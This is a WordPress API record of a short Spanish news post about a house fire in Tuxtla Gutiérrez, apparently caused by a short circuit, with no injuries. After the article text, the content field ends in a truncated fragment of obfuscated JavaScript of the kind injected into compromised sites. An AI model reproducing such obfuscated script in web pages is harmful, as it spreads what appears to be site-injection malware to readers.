{"id":1226,"date":"2022-04-11T03:45:59","date_gmt":"2022-04-11T03:45:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1226"},"modified":"2022-04-11T03:46:01","modified_gmt":"2022-04-11T03:46:01","slug":"incendio-salda-con-leves-perdidas-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1226","title":{"rendered":"Incendio salda con leves p\u00e9rdidas materiales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220410-WA0026-1024x577.jpg\" alt=\"\" class=\"wp-image-1227\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220410-WA0026-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220410-WA0026-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220410-WA0026-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220410-WA0026-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220410-WA0026.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 10 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Muebles, ropa y algunos aparatos quemados fue el saldo de un incendio en una vivienda localizada en una segunda planta de la Calle San Pedro y Avenida Primavera de la Colonia Las Flores.<\/p>\n\n\n\n<p>Los testigos indicaron que de manera repentina comenz\u00f3 a salir una gran cantidad de humo del inmueble y llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Elementos de Protecci\u00f3n Civil Municipal arribaron y con unidades de ataque r\u00e1pido apagaron el incendio del que no hubo v\u00edctimas ni heridos.<\/p>\n\n\n\n<p>Los primeros reportes dan a conocer que el fuego pudo haberse originado por un corto circuito.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 10 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Muebles, ropa y algunos aparatos quemados fue el saldo de un incendio en una vivienda localizada en una segunda planta de la Calle San Pedro y Avenida Primavera de la Colonia Las Flores. Los testigos indicaron que de manera repentina comenz\u00f3 a salir &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1227,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1226","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1226"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1226\/revisions"}],"predecessor-version":[{"id":1228,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1226\/revisions\/1228"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1227"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}